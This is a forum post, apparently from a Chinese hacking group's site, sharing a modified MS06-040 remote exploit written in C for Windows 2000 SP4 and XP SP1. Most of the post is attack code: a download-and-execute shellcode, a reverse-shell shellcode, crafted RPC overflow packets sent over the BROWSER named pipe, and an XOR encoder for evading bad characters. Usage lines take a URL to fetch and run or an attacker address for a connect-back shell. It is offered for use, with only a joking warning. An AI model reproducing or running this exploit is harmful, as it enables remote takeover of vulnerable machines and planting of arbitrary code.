[原创]ms06040 download and reverse shellcode mika 修改版
文章作者:mika[EST]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
首先感谢macro哥哥的代码,没有这个代码俺也不敢去想修改什么exploit。以前经常看bf弄这个漏洞那个漏洞的,也学到了点东西。有代码了,修改就方便了。程序的运行帮助如下:
F:/work/exploits/Release>ms06040rpc
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
rewritten by superlone@eviloctal.com
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Usage: ms06040rpc <host> <download url> <os type>
ms06040rpc <host> <reverse addr> <revser port> <os type>
<download url>:
such as:http://192.168.0.128/test.exe
<reverse addr>:
your host ip address
<reverse port>:
your host listenning port
<os type(1/2)>:
1: win 2000sp4 2:win xpsp1
^_^Mika is telling you:don't play with fire!
嘿嘿~~~一看就懂吧。
我一开始修改的版本在获得反向shell后,如果退出这个shell后就会造成对方机器出现关机对话框。
不过还好,请BF给解决了。嘿嘿
代码在下面:
CODE:
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
// Define Decode Parameter
#define DECODE_LEN 23
#define SC_LEN_OFFSET 8
#define ENC_KEY_OFFSET 13
#define ENC_KEY 0xFF
// Shellcode string
unsigned char sc[1024] = "";
unsigned int Sc_len;
unsigned char shellcodenew[]={//download shellcode
"/xEB/x10/x5B/x4B/x33/xC9/x66/xB9/xEE/xEE/x80/x34/x0B/xFF/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF/xE9/xF2/x00/x00/x00/x5F/x64/xA1/x30"
"/x00/x00/x00/x8B/x40/x0C/x8B/x70/x1C/xAD/x8B/x68/x08/x8B/xF7/x6A"
"/x04/x59/xE8/x92/x00/x00/x00/xE2/xF9/x68/x6F/x6E/x00/x00/x68/x75"
"/x72/x6C/x6D/x54/xFF/x16/x8B/xE8/xE8/x7C/x00/x00/x00/x83/xEC/x20"
"/x8B/xDC/x6A/x20/x53/xFF/x56/x04/xC7/x04/x03/x5C/x61/x2E/x65/xC7"
"/x44/x03/x04/x78/x65/x00/x00/x33/xC0/x50/x50/x53/x57/x50/xFF/x56"
"/x10/x8B/xEC/x81/xED/xBB/x00/x00/x00/x89/x5D/xA0/x8B/x5E/x08/x89"
"/x5D/xA4/x8B/xE5/x81/xEC/xDD/x00/x00/x00/x8D/x85/xA8/xFF/xFF/xFF"
"/x6A/x44/x59/xC6/x00/x00/x40/xE2/xFA/xC7/x45/xA8/x44/x00/x00/x00"
"/x8B/xF4/x8D/x45/xEC/x50/x8D/x4D/xA8/x51/x6A/x00/x6A/x00/x6A/x20"
"/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x8B/x55/xA0/x52/xFF/x55/xA4/x3B"
"/xF4/xE8/xA4/x07/x00/x00/xFF/x56/x0C/x51/x56/x8B/x75/x3C/x8B/x74"
"/x2E/x78/x03/xF5/x56/x8B/x76/x20/x03/xF5/x33/xC9/x49/x41/xAD/x03"
"/xC5/x33/xDB/x0F/xBE/x10/x3A/xD6/x74/x08/xC1/xCB/x0D/x03/xDA/x40"
"/xEB/xF1/x3B/x1F/x75/xE7/x5E/x8B/x5E/x24/x03/xDD/x66/x8B/x0C/x4B"
"/x8B/x5E/x1C/x03/xDD/x8B/x04/x8B/x03/xC5/xAB/x5E/x59/xC3/xE8/x09"
"/xFF/xFF/xFF/x8E/x4E/x0E/xEC/xC1/x79/xE5/xB8/x72/xFE/xB3/x16/xEF"
"/xCE/xE0/x60/x36/x1A/x2F/x70"
};
unsigned char connectbacksc[]=
"/xfc/x6a/xeb/x4d/xe8/xf9/xff/xff/xff/x60/x8b/x6c/x24/x24/x8b/x45"
"/x3c/x8b/x7c/x05/x78/x01/xef/x8b/x4f/x18/x8b/x5f/x20/x01/xeb/x49"
"/x8b/x34/x8b/x01/xee/x31/xc0/x99/xac/x84/xc0/x74/x07/xc1/xca/x0d"
"/x01/xc2/xeb/xf4/x3b/x54/x24/x28/x75/xe5/x8b/x5f/x24/x01/xeb/x66"
"/x8b/x0c/x4b/x8b/x5f/x1c/x01/xeb/x03/x2c/x8b/x89/x6c/x24/x1c/x61"
"/xc3/x31/xdb/x64/x8b/x43/x30/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x40"
"/x08/x5e/x68/x8e/x4e/x0e/xec/x50/xff/xd6/x66/x53/x66/x68/x33/x32"
"/x68/x77/x73/x32/x5f/x54/xff/xd0/x68/xcb/xed/xfc/x3b/x50/xff/xd6"
"/x5f/x89/xe5/x66/x81/xed/x08/x02/x55/x6a/x02/xff/xd0/x68/xd9/x09"
"/xf5/xad/x57/xff/xd6/x53/x53/x53/x53/x43/x53/x43/x53/xff/xd0/x68"
"/xca/x6e/x84/x0b/x66/x68/x10/xe1/x66/x53/x89/xe1/x95/x68/xec/xf9"
"/xaa/x60/x57/xff/xd6/x6a/x10/x51/x55/xff/xd0/x66/x6a/x64/x66/x68"
"/x63/x6d/x6a/x50/x59/x29/xcc/x89/xe7/x6a/x44/x89/xe2/x31/xc0/xf3"
"/xaa/x95/x89/xfd/xfe/x42/x2d/xfe/x42/x2c/x8d/x7a/x38/xab/xab/xab"
"/x68/x72/xfe/xb3/x16/xff/x75/x28/xff/xd6/x5b/x57/x52/x51/x51/x51"
"/x6a/x01/x51/x51/x55/x51/xff/xd0/x68/xad/xd9/x05/xce/x53/xff/xd6"
"/x6a/xff/xff/x37/xff/xd0/x68/xe7/x79/xc6/x79/xff/x75/x04/xff/xd6"
"/xff/x77/xfc/xff/xd0/x68/xef/xce/xe0/x60/x53/xff/xd6/xff/xd0";
BYTE Data2000[] =//packets for win2000.arguments size:AllocHint,less than 5000
{"/x75/x6b/x22"
"/x56/x01/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x1b"
"/xf7/x15/x02/x00/x00/x00/x00/x00/x00/x15/x02/x00/x00/x4a/xf9/x42"
"/xf5/x93/x4a/x93/x37/x93/xf5/x92/x9b/x93/x27/x4f/x47/x49/x37/xd6"
"/xfc/xfd/x27/x4a/x90/x90/x40/x9f/x9f/x9b/x3f/xfd/xf9/x43/x4b/x92"
"/x40/x43/x4e/x96/x49/x90/x93/x3f/x91/x98/x96/xf8/x4a/x99/x3f/x43"
"/xf5/x40/x9f/x47/x9b/x98/x41/x9f/x4b/x3f/x40/x42/x4a/x92/x90/x4f"
"/x92/x46/x96/x40/x41/xfd/x41/x3f/x96/x43/x4e/x49/x43/x4f/x91/xfc"
"/x4f/x93/x3f/x27/x96/x91/x37/x97/x98/x98/x98/x4a/xf5/x91/x96/x93"
"/x93/x47/x97/x49/x96/x97/xf5/xd6/x47/x91/x91/x90/x42/x48/x98/x42"
"/x49/x3f/x93/x90/x93/x4e/x47/x47/x99/x92/x27/xfd/xfd/xfc/x4b/x91"
"/x4b/x43/x4b/xd6/x46/x37/x92/xf5/x46/x4f/x99/x9f/xd6/x97/xf5/x9b"
"/xf8/x43/xf8/x97/x4f/x3f/x41/x27/x96/x92/x27/x93/x4b/x98/x9b/x48"
"/x47/xf8/x93/x48/xfc/x98/xf5/x91/x4f/x9f/x42/x4a/x48/x4a/x97/x4e"
"/x91/x49/x90/xf8/x91/x4f/x92/x96/x92/xd6/x47/x98/x90/x40/xf5/xfc"
"/x46/xf5/x46/xf9/xd6/x4f/xfc/x98/x91/x41/x91/x48/xfc/x98/x49/x49"
"/xfc/x41/x37/x46/x46/xf5/x90/x3f/x48/x4a/x40/x37/x47"
"/x41/xf5/x93"
"/xf8/x40/x92/x49/x4a/x37/xfd/xf8/x93/x9b/x46/x47/x47/x92/x92/x92"
"/x93/x99/x93/x93/xfd/x3f/x42/x47/x90/x96/x92/x4f/x4a/x4a/x93/x93"
"/x46/x3f/xf9/xfd/x90/x9b/x97/x47/x9b/x91/x49/xd6/x97/x91/x4b/x40"
"/x27/x46/x42/x91/x48/x97/x4e/x93/x90/x96/x49/xf5/xf9/x43/x4b/x41"
"/xf5/x48/xfd/x4b/x41/x43/x40/x4b/xf9/x97/xfd/xfc/xf9/xfc/xf9/x96"
"/x9f/x99/xd6/x41/x4a/xd6/x27/x4a/x99/x27/x48/xf5/xf9/x90/x37/x42"
"/x91/x40/xfc/x4b/x41/x96/x90/x9f/xfc/x47/xf5/x27/xf5/x92/x47/x96"
"/x4a/x4f/x92/x46/x98/x4b/x92/x3f/x41/xf8/x46/xd6/xfc/x27/x27/x49"
"/x49/x9f/x27/x4f/x92/x46/xd6/x41/xf9/x37/x37/x97/xfc/x91/xf5/x46"
"/x47/x48/xfd/x96/xf5/x90/x90/x4b/x9b/xfd/xf8/xf8/x4a/x27/x46/x91"
"/x99/x93/x93/xd6/x97/xf9/x43/x9b/xfc/xd6/xfd/x41/xd6/xd6/x9f/x97"
"/x4f/x49/x9b/xd6/x42/x37/x40/xf8/x9b/xfc/x90/xfd/x42/xd6/x41/x49"
"/x97/x3f/x99/x93/xf8/x49/x27/x97/xd6/x92/x47/x93/x4e/x9f/x37/xd6"
"/xfd/xd6/x4b/x42/x46/x91/x4a/x9f/x91/x49/x90/x4e/x49/x48/x98/x27"
"/xd6/x46/x90/x43/x3f/xf9/xf8/x48/x3f/x40/x4b/x9f/x37/x9b/xd6/xfd"
"/x40/xd6/x99/x47/x46/x97/x90/x49/x4e/xfd/x93/x3f/x3f"
"/x4a/xd6/x40"
"/x96/xd6/xf9/x27/xfd/x4f/x43/x90/xf8/x42/xd6/x92/x43/x96/x91/x4a"
"/x46/x4f/xfd/x92/xfc/x40/x37/x97/xf5/xf5/x97/x92/x4b/x99/xf8/x37"
"/xf5/x40/x98/x40/xfc/x42/xf9/x4b/x99/x43/x40/x97/x48/x4e/x49/x41"
"/xf9/x90/x49/xfc/x47/xfd/x93/x48/x42/x4a/x40/xd6/x96/x37/x27/x43"
"/x49/x92/x4f/x41/x93/xd6/x4e/x9f/x43/x98/x4e/xd6/x96/x3f/x9f/x4b"
"/x4a/x99/x47/x37/xfc/xf9/xd6/x99/xf8/x27/x4b/x47/x90/xf9/x49/x4b"
"/xd6/xfd/x99/x90/x4e/x98/xfd/x4b/x96/x43/x4f/x3f/x4a/x90/xf9/x42"
"/x96/x40/x4e/x37/x99/x48/x40/x49/x27/x97/x92/xd6/x37/x93/x37/x46"
"/xfd/x96/x42/x9b/xf8/x9b/x4b/x97/x40/x91/x4b/x93/xd6/x4f/x42/x9f"
"/x4b/x4e/xf5/xfd/x91/x99/xfc/x99/x92/x27/x3f/xf9/x49/xfc/xf5/xf5"
"/x37/x3f/xd6/x92/x4b/xf9/x3f/x97/x4b/x9b/x4f/x49/x47/x47/x3f/xfd"
"/x98/xd6/x37/x4b/x4a/x91/x90/x27/x3f/x97/xf9/xd6/xd6/x90/x40/x40"
"/x43/x43/x40/xf8/x90/x96/x92/x48/x96/x27/xf9/x99/x96/x96/x4f/x96"
"/x4b/x4f/x98/xf9/x41/x93/x99/xd6/x9b/x97/x4e/x4e/xfd/x46/x37/x9f"
"/x40/xfd/x97/x47/x9b/x41/x43/x42/x4e/x40/x4e/x3f/x37/x97/x9f/x37"
"/xfd/x92/x98/x90/x91/xfd/x90/xf8/xfc/x93/x96/x91/x41"
"/x4f/x9f/x46"
"/x92/x27/x4f/x3f/x40/x37/x91/x4e/x4f/xf5/x99/x3f/x4a/x93/x99/x9f"
"/xf5/x90/x46/x93/x43/x27/x27/x4f/x4e/x91/x42/x6a/x35/x59/xd9/xee"
"/xd9/x74/x24/xf4/x5b/x81/x73/x13/xd3/x45/x7d/xa2/x83/xeb/xfc/xe2"
"/xf4/x52/x81/x82/x4d/x2c/xba/x39/x5e/x3b/x01/x7d/xa2/xd3/xce/x38"
"/x9e/x58/x39/x78/xda/xd2/xaa/xf6/xed/xcb/xce/x22/x82/xd2/xae/x34"
"/x29/xe7/xce/x7c/x4c/xe2/x85/xe4/x0e/x57/x85/x09/xa5/x12/x8f/x70"
"/xa3/x11/xae/x89/x99/x87/x61/x79/xd7/x36/xce/x22/x86/xd2/xae/x1b"
"/x29/xdf/x0e/xf6/xfd/xcf/x44/x96/x29/xcf/xce/x7c/x49/x5a/x19/x59"
"/xa6/x10/x74/xbd/xc6/x58/x05/x4d/x27/x13/x3d/x71/x29/x93/x49/xf6"
"/xd2/xcf/xe8/xf6/xca/xdb/xae/x74/x29/x53/xf5/x7d/xa2/xd3/xce/x15"
"/x9e/x8c/x74/x8b/xc2/x85/xcc/x85/x21/x13/x3e/x2d/xca/x3c/x8b/x9d"
"/xc2/xbb/xdd/x83/x28/xdd/x12/x82/x45/xb0/x28/x19/x8c/xb6/x3d/x18"
"/x82/xfc/x26/x5d/xcc/xb6/x31/x5d/xd7/xa0/x20/x0f/x82/xe2/x77/x4e"
"/x82/xe2/x77/x4e/x82/xfc/x04/x39/xe6/xf3/x63/x5b/x82/xbd/x20/x09"
"/x82/xbf/x2a/x1e/xc3/xbf/x22/x0f/xcd/xa6/x35/x5d/xe3/xb7/x28/x14"
"/xcc/xba/x36/x09/xd0/xb2/x31/x12/xd0/xa0/x65/x4c/x90"
"/xe0/x65/x52/xe3/x97/x01/x7d/xa2"
"/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00"
"/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00"
"/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00"
"/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00"
"/x00/x00/x93/xc8/xf5/x00/x00/x00/x02/x00/x00/x00/x00/x00/x00/x00"
"/x02/x00/x00/x00/xeb/x02/x00/x00/x28/x00/x00/x00/x00/x00/x00/x00"
};
BYTE Dataxp[] =//packets for win2000.arguments size:AllocHint,less than 5000
{"/x0e/x4c/x9f/xe6/x01/x00/x00/x00"
"/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/xc8/x52/x63/x01/x00/x00"
"/x00/x00/x00/x00/x63/x01/x00/x00/xfd/x4e/x4a/x48/x43/x4f/x47/x99"
"/x93/xf8/x3f/x40/x98/x92/x9f/x91/x93/x43/xf5/x90/x4e/xd6/x92/x27"
"/x91/x48/x99/xf5/x49/x43/x4e/x93/x49/x43/x90/x98/x4a/x98/x4e/x4f"
"/x27/x46/xf9/x96/xd6/x90/x40/xfc/xfc/x93/x91/xf8/x4f/x27/x98/x42"
"/x4f/x96/x48/x41/x90/x4a/x42/x9f/xfd/x98/x91/x91/x46/x41/x41/x92"
"/x3f/xfc/x99/x93/x4e/x96/x40/x91/x98/x43/x96/x93/xf5/xd6/x4f/x9b"
"/x27/x9f/x9b/xfd/x99/x3f/xfd/x4f/xd6/x91/x4a/x96/x98/xfd/xf9/x9b"
"/x37/x41/xfc/x9f/x42/x4a/x40/xf8/x43/x4a/x98/x41/x91/x91/xf9/xd6"
"/xd6/x9b/x49/x42/x3f/x90/xfc/x9b/x4b/x92/xfc/x37/x96/xfc/x41/x98"
"/xfc/x4f/x4e/x91/x97/x4a/x92/x49/x92/x9f/x91/x41/x4a/x41/x98/x27"
"/x98/xd6/x91/x48/xfc/xfc/xf5/x4b/x9f/x9f/xfc/xd6/xf8/x49/x6a/x35"
"/x59/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x60/xd2/x21/xae/x83"
"/xeb/xfc/xe2/xf4/xe1/x16/xde/x41/x9f/x2d/x65/x52/x88/x96/x21/xae"
"/x60/x59/x64/x92/xeb/xae/x24/xd6/x61/x3d/xaa/xe1/x78/x59/x7e/x8e"
"/x61/x39/x68/x25/x54/x59/x20/x40/x51/x12/xb8/x02/xe4/x12/x55/xa9"
"/xa1/x18/x2c/xaf/xa2/x39/xd5/x95/x34/xf6/x25/xdb/x85/x59/x7e/x8a"
"/x61/x39/x47/x25/x6c/x99/xaa/xf1/x7c/xd3/xca/x25/x7c/x59/x20/x45"
"/xe9/x8e/x05/xaa/xa3/xe3/xe1/xca/xeb/x92/x11/x2b/xa0/xaa/x2d/x25"
"/x20/xde/xaa/xde/x7c/x7f/xaa/xc6/x68/x39/x28/x25/xe0/x62/x21/xae"
"/x60/x59/x49/x92/x3f/xe3/xd7/xce/x36/x5b/xd9/x2d/xa0/xa9/x71/xc6"
"/x8f/x1c/xc1/xce/x08/x4a/xdf/x24/x6e/x85/xde/x49/x03/xbf/x45/x80"
"/x05/xaa/x44/x8e/x4f/xb1/x01/xc0/x05/xa6/x01/xdb/x13/xb7/x53/x8e"
"/x51/xe0/x12/x8e/x51/xe0/x12/x8e/x4f/x93/x65/xea/x40/xf4/x07/x8e"
"/x0e/xb7/x55/x8e/x0c/xbd/x42/xcf/x0c/xb5/x53/xc1/x15/xa2/x01/xef"
"/x04/xbf/x48/xc0/x09/xa1/x55/xdc/x01/xa6/x4e/xdc/x13/xf2/x10/x9c"
"/x53/xf2/x0e/xef/x24/x96/x21/xae/x31/x76/x57/x4e/x65/x59/x45/x4d"
"/x69/x73/x49/x39/x76/x32/x39/x52/x74/x55/x5a/x57/x6c/x6e/x6b/x4b"
"/x51/x64/x39/x4e/x55/x32/x73/x31/x71/x44/x6f/x55/x4d/x44/x6f/x70"
"/x33/x58/x47/x70/x35/x34/x7a/x6e/x61/x4c/x6d/x4e/x39/x30/x50/x39"
"/x47/x4d/x64/x50/x46/x63/x4b/x61/x74/x63/x62/x38/x44/x69/x76/x76"
"/x39/x49/x61/x51/x41/x5a/x37/x36/x6e/x6a/x6f/x6d/x7a/x6e/x46/x43"
"/x46/x79/x4e/x6e/x4c/x4d/x53/x48/x7a/x46/x77/x78/x47/x63/x52/x5a"
"/x35/x30/x6f/x42/x33/x42/x57/x38/x56/x59/x7a/x47/x6b/x78/x62/x6b"
"/x76/x68/x79/x63/x4b/x68/x42/x69/x46/x53/x54/x39/x4a/x6e/x38/x74"
"/x75/x72/x78/x50/x69/x6d/x61/x57/x70/x62/x76/x36/x38/x74/x77/x69"
"/x62/x6b/x4a/x59/x38/x52/x75/x63/x6c/x5a/x62/x77/x32/x51/x6f/x4b"
"/x75/x4c/x6d/x32/x48/x6c/x50/x4f/x37/x53/x48/x74/x34/x65/x4f/x35"
"/x58/x6e/x47/x53/x69/x56/x48/x62/x36/x52/x78/x35/x7a/x61/x4b/x37"
"/x6f/x64/x49/x31/x4b/x6f/x38/x31/x35/x4c/x33/x61/x0a/x08/x02/x00"
"/x77/x6d/x4f/x36/x48/x7a/x47/x79/x04/x08/x02/x00/x7a/x37/x38/x43"
"/x47/x50/x59/x78/x34/x31/x79/x68/x55/x30/x4c/x6b/x61/x43/x6b/x70"
"/x67/x68/x70/x49/x4d/x55/x74/x55/x73/x45/x74/x5a/x04/x08/x02/x00"
"/x5a/x7a/x44/x68/x56/x75/x4e/x6c/x04/x08/x02/x00/x7a/x52/x66/x53"
"/x66/x5a/x54/x49/x75/x56/x6a/x63/x75/x5a/x66/x55/x4c/x6d/x64/x4d"
"/x45/x36/x42/x62/x74/x34/x36/x46/x54/x58/x66/x46/x00/x00/x43/x07"
"/xc7/x00/x00/x00/x01/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00"
"/x00/x00/x8d/xc1/x61/x00/x00/x00/x00/x00/x00/x00"
};
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
BYTE PRPC[0x48] ={0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};//for bind port use
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE POP[] =//stub header RPCFUNC structure
{
"/x05/x00/x00/x03/x10/x00/x00/x00/x80/x04/x00/x00/x01/x00/x00/x00"
"/x68/x04/x00/x00/x00/x00/x1f/x00"
};
void makecode(char *url);
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer) {
BYTE rbuf[0x1000]="";
DWORD dw=0;
struct RPCBIND RPCBind;
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);
return 0;
}
int Attack(HANDLE PipeHandle,char *paramstr,int i,unsigned short port,int type)
{
struct RPCFUNC RPCOP;
int bwritten=0;
BYTE *LargeBuffer=NULL;
BYTE rbuf[0x100]="";
unsigned long ip=0;
DWORD dw;
WSADATA wsa;
WSAStartup(MAKEWORD(2,2),&wsa);
if(strlen(paramstr)==1)
{
}
else if(type==0)
{
makecode(paramstr);
}
else
{
ip=inet_addr(paramstr);
port=htons(port);
memcpy(connectbacksc+160,&ip,4);
memcpy(connectbacksc+166,&port,2);
memcpy(sc,connectbacksc,sizeof(connectbacksc));
Sc_len=sizeof(connectbacksc);
}
memcpy(&RPCOP,&POP,sizeof(RPCOP));
RPCOP.Opnum = 31;
printf("^_^Mika is telling you:don't play with fire!^o^/n/n");
if(i==1)//win 2000
{
RPCOP.FragLength=sizeof(RPCOP)+1128;//1128:size of data1;FragLength:size ofPOP+size of data1
RPCOP.AllocHint=1128;
LargeBuffer=(BYTE *)malloc(24+1128);
memset(LargeBuffer,0x00,24+1128);
memcpy(LargeBuffer,&RPCOP,24);
memcpy(LargeBuffer+24,&Data2000,1128);
if(strlen(paramstr)!=1)
{
memcpy(LargeBuffer+24+32, sc, Sc_len);
}
printf("Sending payload.../n");
TransactNamedPipe(PipeHandle, LargeBuffer,
24+1128, rbuf, sizeof(rbuf), &dw, NULL);
}
if(i==2)//win xp
{
RPCOP.FragLength=sizeof(RPCOP)+772;//772:size of dataxp;FragLength:size of POP+size of data1
RPCOP.AllocHint=772;
LargeBuffer=(BYTE *)malloc(24+772);
memset(LargeBuffer,0x00,24+772);
memcpy(LargeBuffer,&RPCOP,24);
memcpy(LargeBuffer+24,&Dataxp,772);
printf("Sending payload1...finish/n");
memcpy(LargeBuffer+24+32, sc, Sc_len);
TransactNamedPipe(PipeHandle, LargeBuffer,
24+772, rbuf, sizeof(rbuf), &dw, NULL);
printf("Sending payload2...finish/n");
memset(LargeBuffer,0x00,24+772);
memcpy(LargeBuffer,&RPCOP,24);
memcpy(LargeBuffer+24,&Dataxp,772);
memcpy(LargeBuffer+24+32, sc, Sc_len);
TransactNamedPipe(PipeHandle, LargeBuffer,
24+772, rbuf, sizeof(rbuf), &dw, NULL);
}
free(LargeBuffer);
return 0;
}
void makecode(char *url)
{
int length=0;
unsigned int Enc_key=ENC_KEY;
unsigned int i,j,l;
Sc_len = sizeof(shellcodenew)+strlen(url)+2;
ZeroMemory(sc,1024);
memcpy(sc,shellcodenew,sizeof(shellcodenew));
memcpy(sc+sizeof(shellcodenew)-1,url,strlen(url));
for(i=0xff; i>0; i--)
{
l = 0;
for(j=DECODE_LEN; j<Sc_len; j++)
{
if (
((sc[j] ^ i) == 0x26) || //%
((sc[j] ^ i) == 0x3d) || //=
((sc[j] ^ i) == 0x3f) || //?
((sc[j] ^ i) == 0x40) || //@
((sc[j] ^ i) == 0x00) ||
((sc[j] ^ i) == 0x0D) ||
((sc[j] ^ i) == 0x0A) ||
((sc[j] ^ i) == 0x5c) ||
((sc[j] ^ i) == 0x5f) ||
((sc[j] ^ i) == 0x2e) ||
((sc[j] ^ i) == 0x2f)
) // Define Bad Characters
{
l++; // If found the right XOR byte,l equals 0
break;
};
}
if (l==0)
{
Enc_key = i;
printf("[+] Find XOR Byte: 0x%02X/n", i);
for(j=DECODE_LEN; j<Sc_len; j++)
{
sc[j] ^= Enc_key;
}
break; // If found the right XOR byte, Break
}
}
// Deal with not found XOR byte
if (l!=0)
{
printf("[-] No xor byte found!/r/n");
exit(-1);
}
// Deal with DeCode string
*(unsigned short *)&sc[SC_LEN_OFFSET] = Sc_len;
*(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
if (argc<4)
{
printf(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>/n");
printf("/t/t rewritten by [email]superlone@eviloctal.com[/email]/n");
printf(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>/n/n");
printf("Usage: %s <host> <download url> <os type>/n/n", argv[0]);
printf("/t%s <host> <reverse addr> <revser port> <os type>/n/n",argv[0]);
printf(" <download url>:/n/t/tsuch as:[url]http://192.168.0.128/test.exe[/url]/n/n");
printf("<reverse addr>:/n/t/tyour host ip address/n/n");
printf("<reverse port>:/n/t/tyour host listenning port/n/n");
printf("<os type(1/2)>:/n/t/t 1: win 2000sp4 2:win xpsp1/n/n");
printf("^_^Mika is telling you:don't play with fire!/n");
return 1;
}
server=argv[1];
_snprintf(unc, sizeof(unc), "%s//pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
WNetAddConnection2(&nr, "", "", 0);
_snprintf(szPipe, sizeof(szPipe),
"%s//pipe//BROWSER",server);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);
BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");
if (argc==5)
{
Attack(hFile,argv[2],atoi(argv[4]),atoi(argv[3]),1);
}
else
{
//SendMalformed RPC request
Attack(hFile,argv[2],atoi(argv[3]),0,0);
}
return 0;
}
[Copy to clipboard]
再次感谢macro哥哥的无私共享,不然俺要写出这么个程序来还得很长的路要走!
2069
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
